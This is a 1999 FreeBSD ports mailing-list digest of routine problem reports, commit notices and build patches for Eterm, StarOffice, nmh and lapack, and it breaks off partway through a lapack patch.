mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 6:37:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3380C155C6; Wed, 22 Dec 1999 06:37:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA74771; Wed, 22 Dec 1999 06:37:20 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Wed, 22 Dec 1999 06:37:20 -0800 (PST) From: Message-Id: <199912221437.GAA74771@freefall.freebsd.org> To: gmarco@giovannelli.it, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15060: Update port: misc/fortuneit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: misc/fortuneit State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Wed Dec 22 06:35:41 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 6:42:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3954614C0C; Wed, 22 Dec 1999 06:42:10 -0800 (PST) (envelope-from max@FreeBSD.org) Received: (from max@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA01231; Wed, 22 Dec 1999 06:42:09 -0800 (PST) (envelope-from max@FreeBSD.org) Date: Wed, 22 Dec 1999 06:42:09 -0800 (PST) From: Message-Id: <199912221442.GAA01231@freefall.freebsd.org> To: t80382@naoe.t.u-tokyo.ac.jp, max@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15372: ja-platex2e ports are too obsolete Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ja-platex2e ports are too obsolete State-Changed-From-To: open->closed State-Changed-By: max State-Changed-When: Wed Dec 22 06:40:48 PST 1999 State-Changed-Why: The platex-* ports have been updated. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 6:58:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ms.tokyo.jcom.ne.jp (ms.tokyo.jcom.ne.jp [210.234.123.18]) by hub.freebsd.org (Postfix) with ESMTP id 4937B15037 for ; Wed, 22 Dec 1999 06:58:47 -0800 (PST) (envelope-from musha@ms.tokyo.jcom.ne.jp) Received: from daemon.local.idaemons.org (pc343031.tokyo.jcom.ne.jp [203.140.143.31]) by ms.tokyo.jcom.ne.jp (8.9.1/3.7W 06/01/99) with ESMTP id XAA09763; Wed, 22 Dec 1999 23:58:44 +0900 (JST) Received: by daemon.local.idaemons.org (8.9.3/3.7W) id XAA66180; Wed, 22 Dec 1999 23:58:12 +0900 (JST) Date: Wed, 22 Dec 1999 23:58:11 +0900 Message-ID: <86ogbj2fb0.wl@localhost.local.idaemons.org> From: Akinori MUSHA aka knu To: freebsd-ports@FreeBSD.org Cc: ady@freebsd.ady.ro Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: In your message of "Wed, 22 Dec 1999 13:13:59 +0200 (EET)" References: <86so1aeib0.wl@localhost.local.idaemons.org> User-Agent: Wanderlust/2.2.12 (Joyride) EMIKO/1.13.9 (Euglena tripteris) FLIM/1.13.2 (Kasanui) MULE XEmacs/21.1 (patch 8) (Bryce Canyon) (i386--freebsd) Organization: A.I.D. MIME-Version: 1.0 (generated by EMIKO 1.13.9 - "Euglena tripteris") Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! At Wed, 22 Dec 1999 13:13:59 +0200 (EET), Adrian Penisoara wrote: > Finally, I have build up a patchset to upgrade from the current 4.5 > sources to version 4.7. Thanks! I've been so busy on my work I cannot take my time out hacking imap-utils... But I'm trying your new port, which seems working just fine! (I did 'make PAMAUTH=yes install') However, I've got something to point out, you know, imap-utils seem to be distributed *unofficially* as you can see the file called imap-utils.tar.Z isn't laid statically, that is to say, its md5 checksum will change irregularly. A headache. Maybe we must have another master site to put the snapshots of it like imap-utils-4.7.tar.Z, imap-utils-4.8.tar.Z, etc? (Yes, .gz or .bz2 would be better) -- / /__ __ / ) ) ) ) / http://www.idaemons.org/knu/ Akinori MUSHA aka / (_ / ( (__( mailto:knu@idaemons.org "We are but hungry.. Associated Ita-meshi Daemons!" http://www.idaemons.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 7:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 99C48154B1 for ; Wed, 22 Dec 1999 07:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA06057; Wed, 22 Dec 1999 07:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3]) by hub.freebsd.org (Postfix) with ESMTP id D86AF14FAA for ; Wed, 22 Dec 1999 07:26:03 -0800 (PST) (envelope-from newton@atdot.dotat.org) Received: (from newton@localhost) by atdot.dotat.org (8.9.3/8.7) id BAA24144; Thu, 23 Dec 1999 01:52:29 +1030 (CST) Message-Id: <199912221522.BAA24144@atdot.dotat.org> Date: Thu, 23 Dec 1999 01:52:29 +1030 (CST) From: Mark Newton Reply-To: newton@atdot.dotat.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15628: Eterm patch for setuid operation and fixed VSTATUS handling Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15628 >Category: ports >Synopsis: Eterm mis-handles ^J, and also glitches with setuid operation >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 07:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mark Newton >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: Eterm-0.8.9 port >Description: Much mailing list traffic has been expended on the fact that Eterm users who hit the return key tend to see a line like "load: 0.26 cmd: cat 24061 [ttyin] 0.00u 0.00s 0% 88k" instead of having their input line actually acted on. Additionally, the eterm 0.8.9 port doesn't handle setuid operation correctly, utmp logging doesn't work and the tty device it's running on doesn't get chown'ed (so biff, mesg and friends don't work). The patch below fixes the problem. >How-To-Repeat: Install the Eterm port; Type "cat" and hit return a few times. Type "mesg n" and observe the "permission denied" messages. >Fix: See the patch below. The patch affects src/command.c. It seems that the Eterm handling of saved setuid is bogus, or perhaps Eterm's interpretation of how it should work differs from our interpretation of how it really works :-). I've dealt with this problem by pretending it doesn't exist: If you #undef the config parameter which says you support saved setuid, the Eterm source will fall-back to traditional UNIX setuid handling, which doesn't exhibit the same problems Eterm produces when it tries to used saved setuid. As such, "#undef HAVE_SAVED_UIDS" just after including config.h works-around the bug (so this isn't really a fix; it just brute-force encourages Eterm to try another way to do the thing it's trying to do). The second part of the patch adds support for the VSTATUS termios control character to the terminal setup part of command.c. The patch includes and sets the VSTATUS character to CSTATUS like god intended. This stops the annoying kerninfo output whenever you hit the RETURN key while the terminal is in canonical mode (i.e.: whenever you're running a program which expects to consume stdin, like "su" or "cat"). According to a quick perusal of the mailing list archive, people have been complaining about this one since August, so it's probably about time it was fixed :-) *** src/command.c.old Thu Dec 23 01:39:37 1999 --- src/command.c Thu Dec 23 01:42:00 1999 *************** *** 40,45 **** --- 40,47 ---- #include "feature.h" #include "config.h" + #undef HAVE_SAVED_UIDS + /* System Headers */ #include #include *************** *** 120,125 **** --- 122,128 ---- #endif #ifdef HAVE_TERMIOS_H # include + # include #else # include #endif *************** *** 2100,2105 **** --- 2103,2111 ---- # endif # if VTIME != VEOL tio->c_cc[VTIME] = 0; + # endif + # ifdef VSTATUS + tio->c_cc[VSTATUS] = CSTATUS; # endif /* input modes */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 7:40: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B7DED151AF for ; Wed, 22 Dec 1999 07:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA06811; Wed, 22 Dec 1999 07:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 07:40:02 -0800 (PST) Message-Id: <199912221540.HAA06811@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Darren Wiebe Subject: Re: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Reply-To: Darren Wiebe Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15622; it has been noted by GNATS. From: Darren Wiebe To: ust@cert.siemens.de Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Date: Thu, 23 Dec 1999 08:34:24 -0700 Looks great! I just discovered yesterday that it had a problem, and had not made a diff up yet. Thanks! BTW. I have another small patch here which somebody sent me. Can we just run it through here to?? It allows those of us with small /tmp directories. --- Makefile.orig Tue Dec 21 09:29:46 1999 +++ Makefile Tue Dec 21 09:53:16 1999 @@ -30,6 +30,7 @@ NO_BUILD= yes DIST_SUBDIR= staroffice5 WRKSRC= ${WRKDIR}/so51inst +TEMPDIR= /tmp .include @@ -60,12 +61,12 @@ do-install: @${ECHO} "${WRKDIR}/tmp" >> /compat/linux/etc/ld.so.conf - @${ECHO} "/tmp/sv001.tmp" >> /compat/linux/etc/ld.so.conf - @PATH=${PATH}:/tmp/sv001.tmp:/usr/compat/linux/tmp/sv001.tmp:/usr/compat/linux/tmp:/tmp - @LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:/tmp:${WRKDIR}/tmp:/usr/lib:/lib:/tmp:/usr/compat/linux/lib + @${ECHO} "${TEMPDIR}/sv001.tmp" >> /compat/linux/etc/ld.so.conf + @PATH=${PATH}:${TEMPDIR}/sv001.tmp:/usr/compat/linux/tmp/sv001.tmp:/usr/compat/linux/tmp:/tmp + @LD_LIBRARY_PATH=${LD_LIBRARY_PATH}:${TEMPDIR}:${WRKDIR}/tmp:/usr/lib:/lib:/tmp:/usr/compat/linux/lib @/usr/compat/linux/sbin/ldconfig @${CAT} ${PKGDIR}/MESSAGE - @-${WRKDIR}/so51inst/office51/setup /net + @-TEMP=${TEMPDIR} ${WRKDIR}/so51inst/office51/setup /net # A seperate target as we need to be able to run this stuff independantly. post-install: Udo Schweigert wrote: > > >Number: 15622 > >Category: ports > >Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM > >Confidential: no > >Severity: non-critical > >Priority: low > >Responsible: freebsd-ports > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Wed Dec 22 00:30:01 PST 1999 > >Closed-Date: > >Last-Modified: > >Originator: Udo Schweigert > >Release: FreeBSD 3.4-STABLE i386 > >Organization: > Siemens AG, ZT IK 3 > >Environment: > > FreeBSD 3.4-STABLE i386 > > >Description: > > When doing make USE_CDROM=yes in /usr/ports/editors/staroffice5 I get > > ===> staroffice-5.1a depends on executable: unzip - found > ln: illegal option -- v > usage: ln [-fs] file1 file2 > ln [-fs] file ... directory > > >How-To-Repeat: > > As described. > > >Fix: > > Apply this patch: > > --- Makefile.orig Wed Dec 15 00:14:28 1999 > +++ Makefile Tue Dec 21 14:47:13 1999 > @@ -47,7 +47,7 @@ > .if defined(USE_CDROM) > do-extract: > @${MKDIR} ${WRKSRC}/office51 > - @cd ${WRKSRC}/office51 && ${LN} -s -v /cdrom/linux/office51/* . > + @cd ${WRKSRC}/office51 && ${LN} -s /cdrom/linux/office51/* . > .endif > > post-extract: > > >Release-Note: > >Audit-Trail: > >Unformatted: > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ports" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 7:54: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id A04BB14FAA for ; Wed, 22 Dec 1999 07:53:57 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.12 #1) id 120o57-000OAq-00; Wed, 22 Dec 1999 09:53:41 -0600 Date: Wed, 22 Dec 1999 09:53:41 -0600 From: Ade Lovett To: John and Jennifer Reynolds Cc: ports@freebsd.org Subject: Re: anyone working on gnome-pilot? Message-ID: <19991222095341.A92612@lovett.com> References: <14432.22932.78396.399799@whale.home-net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14432.22932.78396.399799@whale.home-net>; from jjreynold@home.com on Tue, Dec 21, 1999 at 09:54:44PM -0700 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 21, 1999 at 09:54:44PM -0700, John and Jennifer Reynolds wrote: > > Is anybody currently working on gnome-pilot? Yup. I've got a skeleton based on a relatively old (0.1.40) version of gnome-pilot around here somewhere [my fileserver puked a couple of disks the other day, so I'm still bringing things back from tape] When I get a chance, I'll update it to 0.1.46 (the current version, I believe), and make it available for some further testing before sending it in. -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 8:17:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from cx587235-a.chnd1.az.home.com (cx587235-a.chnd1.az.home.com [24.11.88.170]) by hub.freebsd.org (Postfix) with ESMTP id CB01B14DBD for ; Wed, 22 Dec 1999 08:17:33 -0800 (PST) (envelope-from jjreynold@home.com) Received: from whale.home-net (whale [192.168.1.2]) by cx587235-a.chnd1.az.home.com (8.9.3/8.9.3) with ESMTP id JAA61795; Wed, 22 Dec 1999 09:17:32 -0700 (MST) (envelope-from jjreynold@home.com) Received: (from jjreynold@localhost) by whale.home-net (8.9.3/8.9.3) id JAA39513; Wed, 22 Dec 1999 09:17:32 -0700 (MST) (envelope-from jjreynold@home.com) From: John and Jennifer Reynolds MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14432.63899.673504.550939@whale.home-net> Date: Wed, 22 Dec 1999 09:17:31 -0700 (MST) To: Ade Lovett Subject: Re: anyone working on gnome-pilot? In-Reply-To: <19991222095341.A92612@lovett.com> References: <14432.22932.78396.399799@whale.home-net> <19991222095341.A92612@lovett.com> X-Mailer: VM 6.73 under Emacs 20.4.1 Cc: ports@freebsd.org Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ On Wednesday, December 22, Ade Lovett wrote: ] > > Yup. I've got a skeleton based on a relatively old (0.1.40) version of > gnome-pilot around here somewhere [my fileserver puked a couple of disks > the other day, so I'm still bringing things back from tape] > > When I get a chance, I'll update it to 0.1.46 (the current version, > I believe), and make it available for some further testing before > sending it in. > > -aDe > Oh good ... I have only created a simple port and this one would have been much more involved. I was able to compile 0.1.46 without any hitches (but their code sure does have a lot of sloppiness creating warnings everywhere) once I got the right ENV variables set and gave the correct flags to configure. Haven't tested it though ... Eagerly looking forward to your updated port. I'll be a tester! -Jr -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= John Reynolds Chandler Capabilities Engineering, CDS, Intel Corporation jreynold@sedona.ch.intel.com My opinions are mine, not Intel's. Running jjreynold@home.com FreeBSD 3.4-STABLE. FreeBSD: The Power to Serve. http://members.home.com/jjreynold/ Come join us!!! @ http://www.FreeBSD.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 9:30: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5C5271553E for ; Wed, 22 Dec 1999 09:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA17950; Wed, 22 Dec 1999 09:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 22 Dec 1999 09:30:04 -0800 (PST) Message-Id: <199912221730.JAA17950@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Scott Blachowicz Subject: Re: ports/15423: update mail/nmh port to nmh-1.0.2 Reply-To: Scott Blachowicz Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15423; it has been noted by GNATS. From: Scott Blachowicz To: FreeBSD-gnats-submit@FreeBSD.ORG Cc: Subject: Re: ports/15423: update mail/nmh port to nmh-1.0.2 Date: Wed, 22 Dec 1999 09:24:06 -0800 Hi- It's been brought to my attention that I goofed in constructing that patch. I removed the 'patches/patch-ad' file from the port, but that fact didn't make it into my submitted patch. I'm not sure how that normally gets handled (use 'diff -N' to create patch & expect 'patch -E' to get used later?). Is there anything else I need to do at this point aside from sending this message? Should I resubmit a patch? Sorry, Scott.Blachowicz@seaslug.org Scott.Blachowicz@seaslug.org wrote: > > >Number: 15423 > >Category: ports > >Synopsis: update mail/nmh port to nmh-1.0.2 > >Confidential: no > >Severity: non-critical > >Priority: low > >Responsible: freebsd-ports > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: change-request > >Submitter-Id: current-users > >Arrival-Date: Sat Dec 11 13:00:01 PST 1999 > >Closed-Date: > >Last-Modified: > >Originator: Scott Blachowicz > >Release: FreeBSD 3.2-RELEASE i386 > >Organization: > none > >Environment: > > FreeBSD > > >Description: > > Update port to most recent version of the nmh software. Following > changes made to port: > > 1) Updated to nmh-1.0.2 from nmh-1.0. > 2) No longer have the added complexity of patching "-libdir" > option to be "-libexecdir", since everything that gets > installed to the nmh "libdir" need to go to "libexec". Just > set -libdir=PREFIX/libexec instead. > 3) Now run autoconf via USE_AUTOCONF flag instead of trying to > patch both autoconf input & output files. > 4) Removed what appears to be an ineffective attempt to patch > things to do FLOCK_LOCKING instead of DOT_LOCKING (when it > should be using dot locking anyways). > 5) Tweaked DESCR to make it more obvious this is a MUA package. > > >How-To-Repeat: > > > > >Fix: > > Apply patch: > ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 9:32:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 72B88156FB; Wed, 22 Dec 1999 09:32:20 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA18236; Wed, 22 Dec 1999 09:32:20 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 22 Dec 1999 09:32:20 -0800 (PST) From: Message-Id: <199912221732.JAA18236@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-ports@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: ports/15423: update mail/nmh port to nmh-1.0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update mail/nmh port to nmh-1.0.2 Responsible-Changed-From-To: freebsd-ports->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Wed Dec 22 09:32:02 PST 1999 Responsible-Changed-Why: I'll take this one. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 10:20: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 21E2814D67 for ; Wed, 22 Dec 1999 10:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA22509; Wed, 22 Dec 1999 10:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from navy.csi.cam.ac.uk (navy.csi.cam.ac.uk [131.111.8.49]) by hub.freebsd.org (Postfix) with ESMTP id 9CEA114DBB for ; Wed, 22 Dec 1999 10:17:13 -0800 (PST) (envelope-from sa264@phy.cam.ac.uk) Received: from yamame.phy.cam.ac.uk ([131.111.79.201]) by navy.csi.cam.ac.uk with esmtp (Exim 3.03 #1) id 120qJz-0004i5-00 for FreeBSD-gnats-submit@freebsd.org; Wed, 22 Dec 1999 18:17:11 +0000 Received: (from sa264@localhost) by yamame.phy.cam.ac.uk (8.9.3/3.7W) id SAA11615; Wed, 22 Dec 1999 18:17:10 GMT Message-Id: <199912221817.SAA11615@yamame.phy.cam.ac.uk> Date: Wed, 22 Dec 1999 18:17:10 GMT From: sa264@cam.ac.uk Reply-To: sa264@phy.cam.ac.uk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15630: [PATCH] math/lapack port partially broken Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15630 >Category: ports >Synopsis: [PATCH] math/lapack port partially broken >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 10:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: AMAKAWA Shuhei >Release: FreeBSD 3.4-RELEASE i386 >Organization: University of Cambridge >Environment: FreeBSD 3.4-RELEASE i386 >Description: Testing fails due to the recent update of the lapack distribution. >How-To-Repeat: cd /usr/port/math/lapack make ENABLE_TESTING=YES Error(s) will follow. >Fix: Suggested fix (diff from the present port). diff -crN lapack/patches/patch-af lapack.new/patches/patch-af *** lapack/patches/patch-af Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-af Wed Dec 22 10:07:11 1999 *************** *** 0 **** --- 1,11 ---- + --- TESTING/LIN/Makefile.orig Thu Nov 4 19:27:21 1999 + +++ TESTING/LIN/Makefile Wed Dec 22 10:06:14 1999 + @@ -36,7 +36,7 @@ + + ALINTST = \ + aladhd.o alaerh.o alaesm.o alahd.o alareq.o \ + - alasum.o alasvm.o chkxer.o icopy.o ilaenv.o xlaenv.o xerbla.o + + alasum.o alasvm.o chkxer.o icopy.o ilaenv.o xlaenv.o xerbla.o $(FPMCLR) + + SCLNTST= slaord.o + diff -crN lapack/patches/patch-ai lapack.new/patches/patch-ai *** lapack/patches/patch-ai Thu Oct 14 00:06:50 1999 --- lapack.new/patches/patch-ai Wed Dec 22 13:58:47 1999 *************** *** 1,38 **** ! --- TESTING/EIG/Makefile.orig Tue Mar 2 16:41:11 1999 ! +++ TESTING/EIG/Makefile Wed Oct 6 11:04:27 1999 ! @@ -63,7 +63,7 @@ ! sget54.o sglmts.o sgqrts.o sgrqts.o sgsvts.o \ ! shst01.o slarfy.o slarhs.o slatm4.o slctes.o slctsx.o slsets.o sort01.o \ ! sort03.o ssbt21.o ssgt01.o sslect.o sspt21.o sstt21.o \ ! - sstt22.o ssyt21.o ssyt22.o ! + sstt22.o ssyt21.o ssyt22.o $(FPMCLR) ! ! CEIGTST = cchkee.o \ ! cbdt01.o cbdt02.o cbdt03.o \ ! @@ -80,7 +80,7 @@ ! chbt21.o chet21.o chet22.o chpt21.o chst01.o \ ! clarfy.o clarhs.o clatm4.o clctes.o clctsx.o clsets.o csbmv.o \ ! csgt01.o cslect.o \ ! - cstt21.o cstt22.o cunt01.o cunt03.o ! + cstt21.o cstt22.o cunt01.o cunt03.o $(FPMCLR) ! ! DZIGTST = dlafts.o dlahd2.o dlasum.o dlatb9.o dstech.o dstect.o \ ! dsvdch.o dsvdct.o dsxt1.o ! @@ -100,7 +100,7 @@ ! dget54.o dglmts.o dgqrts.o dgrqts.o dgsvts.o \ ! dhst01.o dlarfy.o dlarhs.o dlatm4.o dlctes.o dlctsx.o dlsets.o dort01.o \ ! dort03.o dsbt21.o dsgt01.o dslect.o dspt21.o dstt21.o \ ! - dstt22.o dsyt21.o dsyt22.o ! + dstt22.o dsyt21.o dsyt22.o $(FPMCLR) ! ! ZEIGTST = zchkee.o \ ! zbdt01.o zbdt02.o zbdt03.o \ ! @@ -117,7 +117,7 @@ ! zhbt21.o zhet21.o zhet22.o zhpt21.o zhst01.o \ ! zlarfy.o zlarhs.o zlatm4.o zlctes.o zlctsx.o zlsets.o zsbmv.o \ ! zsgt01.o zslect.o \ ! - zstt21.o zstt22.o zunt01.o zunt03.o ! + zstt21.o zstt22.o zunt01.o zunt03.o $(FPMCLR) ! ! all: single complex double complex16 --- 1,11 ---- ! --- TESTING/EIG/Makefile.orig Thu Nov 4 19:27:50 1999 ! +++ TESTING/EIG/Makefile Wed Dec 22 13:58:11 1999 ! @@ -43,7 +43,7 @@ ! ilaenv.o \ ! xerbla.o \ ! xlaenv.o \ ! - chkxer.o ! + chkxer.o $(FPMCLR) + SCIGTST = slafts.o slahd2.o slasum.o slatb9.o sstech.o sstect.o \ + ssvdch.o ssvdct.o ssxt1.o diff -crN lapack/patches/patch-ap lapack.new/patches/patch-ap *** lapack/patches/patch-ap Thu Oct 14 00:06:51 1999 --- lapack.new/patches/patch-ap Wed Dec 22 13:49:24 1999 *************** *** 1,19 **** ! --- TIMING/EIG/Makefile.orig Fri Mar 12 15:17:19 1999 ! +++ TIMING/EIG/Makefile Wed Oct 6 12:12:00 1999 ! @@ -46,13 +46,13 @@ ! dprtbe.o dprtbg.o dprtbr.o dprtbs.o dprtbv.o ! SEIGTIM = stimee.o \ ! - slaqzh.o slatm4.o stim21.o stim22.o stim26.o stim51.o seispack.o ! + slaqzh.o slatm4.o stim21.o stim22.o stim26.o stim51.o seispack.o $(FPMCLR) ! CEIGTIM = ctimee.o \ ! - claqzh.o clatm4.o ctim21.o ctim22.o ctim26.o ctim51.o ceispack.o ! + claqzh.o clatm4.o ctim21.o ctim22.o ctim26.o ctim51.o ceispack.o $(FPMCLR) ! ! DEIGTIM = dtimee.o \ ! - dlaqzh.o dlatm4.o dtim21.o dtim22.o dtim26.o dtim51.o deispack.o ! + dlaqzh.o dlatm4.o dtim21.o dtim22.o dtim26.o dtim51.o deispack.o $(FPMCLR) ! ! ZEIGTIM = ztimee.o \ ! zlaqzh.o zlatm4.o ztim21.o ztim22.o ztim26.o ztim51.o zeispack.o --- 1,11 ---- ! --- TIMING/EIG/Makefile.orig Thu Nov 4 19:28:20 1999 ! +++ TIMING/EIG/Makefile Wed Dec 22 13:48:21 1999 ! @@ -35,7 +35,7 @@ ! # ! ####################################################################### ! -AEIGTIM = atimin.o ilaenv.o xlaenv.o ! +AEIGTIM = atimin.o ilaenv.o xlaenv.o $(FPMCLR) ! SCIGTIM = \ ! smflop.o sopla.o sopla2.o sopbl3.o \ diff -crN lapack/patches/patch-aw lapack.new/patches/patch-aw *** lapack/patches/patch-aw Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-aw Wed Dec 22 10:06:48 1999 *************** *** 0 **** --- 1,19 ---- + --- TESTING/LIN/schkaa.f.orig Thu Nov 4 19:27:00 1999 + +++ TESTING/LIN/schkaa.f Wed Dec 22 10:03:15 1999 + @@ -118,7 +118,7 @@ + $ SCHKQP, SCHKQR, SCHKRQ, SCHKSP, SCHKSY, SCHKTB, + $ SCHKTP, SCHKTR, SCHKTZ, SDRVGB, SDRVGE, SDRVGT, + $ SDRVLS, SDRVPB, SDRVPO, SDRVPP, SDRVPT, SDRVSP, + - $ SDRVSY + + $ SDRVSY, FPMCLR + * .. + * .. Scalars in Common .. + LOGICAL LERR, OK + @@ -138,6 +138,7 @@ + * .. + * .. Executable Statements .. + * + + CALL FPMCLR( ) + S1 = SECOND( ) + LDA = NMAX + FATAL = .FALSE. diff -crN lapack/patches/patch-ax lapack.new/patches/patch-ax *** lapack/patches/patch-ax Thu Jan 1 01:00:00 1970 --- lapack.new/patches/patch-ax Wed Dec 22 10:46:50 1999 *************** *** 0 **** --- 1,19 ---- + --- TESTING/LIN/cchkaa.f.orig Thu Nov 4 19:26:41 1999 + +++ TESTING/LIN/cchkaa.f Wed Dec 22 10:46:17 1999 + @@ -120,7 +120,7 @@ + $ CCHKQ3, CCHKQL, CCHKQP, CCHKQR, CCHKRQ, CCHKSP, + $ CCHKSY, CCHKTB, CCHKTP, CCHKTR, 